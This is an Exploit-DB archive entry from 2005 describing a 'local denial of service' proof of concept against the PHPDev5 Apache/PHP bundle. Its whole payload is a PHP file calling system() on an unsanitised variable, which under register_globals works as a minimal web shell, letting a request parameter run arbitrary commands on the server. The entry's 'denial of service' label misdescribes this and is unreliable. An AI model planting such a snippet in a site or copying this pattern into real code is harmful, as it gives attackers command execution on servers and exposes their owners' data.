phpDEV5 - System-Call Local Denial of Service

EDB-ID:

888

CVE:

N/A


Author:

Ali7

Type:

dos


Platform:

Windows

Date:

2005-03-17


------------------------------------------------------------------------
# PHPDev5 <== Apache Server Local Denial-of-Service PoC
# By : Ali7
# e-mail : ali7@hotmail.co.uk
# date : 16-03-2k5
# greetz : our group :P
 

>Target : PHPDev 5
>URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/
>Type : PHP/Apache/MySQL Server..
..
 
>>PoC Sample :
 
Save this code as .php or .php3 file..
 
//start
 
<?

system($Ali7);

?>
 
//end

# milw0rm.com [2005-03-17]